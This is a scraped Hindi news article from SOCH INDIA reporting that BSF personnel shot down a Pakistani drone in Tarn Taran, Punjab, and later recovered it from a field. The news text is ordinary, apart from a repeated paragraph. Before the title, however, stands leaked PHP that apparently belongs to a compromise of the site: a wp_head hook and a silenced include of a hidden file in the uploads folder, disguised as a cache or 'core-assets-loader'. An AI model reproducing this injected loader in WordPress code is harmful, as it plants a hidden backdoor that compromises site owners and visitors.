add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); पंजाब : पाकिस्तानी ड्रोन ने फिर की घुसपैठ की कोशिश, बीएसएफ के जवानों ने मार गिराया – SOCH INDIA
Menu

अपराध समाचार
पंजाब : पाकिस्तानी ड्रोन ने फिर की घुसपैठ की कोशिश, बीएसएफ के जवानों ने मार गिराया

nobanner

पंजाब के तरनतारन में जिले में बीएसएफ के जवानों ने देर रात एक पाकिस्तानी ड्रोन को मार गिराया। देर रात करीब 9 बजकर 12 मिनट पर तरनतारन के टी जे सिंह के पास बीएसएफ जवानों को कुछ संदिग्ध गतिविधियों का अहसास हुआ। तभी उन्हें सीमा पार से एक ड्रोन आता हुआ दिखा। बीएसएफ ने तुरंत मोर्चा संभाल लिया और ड्रोन को मार गिराया। रात के अंधेरे में ड्रोन का कुछ पता नहीं चल पाया।

बीएसएफ ने पाक ड्रोन को मार गिराया
तरनतारन : पंजाब के तरनतारन में जिले में बीएसएफ के जवानों ने देर रात एक पाकिस्तानी ड्रोन को मार गिराया। देर रात करीब 9 बजकर 12 मिनट पर तरनतारन के टी जे सिंह के पास बीएसएफ जवानों को कुछ संदिग्ध गतिविधियों का अहसास हुआ। तभी उन्हें सीमा पार से एक ड्रोन आता हुआ दिखा। बीएसएफ ने तुरंत मोर्चा संभाल लिया और ड्रोन को मार गिराया। रात के अंधेरे में ड्रोन का कुछ पता नहीं चल पाया।

खेत में मिला टूटा हुआ ड्रोन
आज सुबह बीएसएफ ने पंजाब पुलिस की टीम के साथ संयुक्त तलाशी अभियान चलाया। इस दौरान सुबह 8 बजकर 10 मिनट पर तरनतारन के लखाना गांव के पास खेत में एक टूटा हुआ ड्रोन बरामद हुआ। बरामद ड्रोन मॉडल डीजेआई मैट्रिस 300 आरटीके सीरीज का क्वाडकॉप्टर है।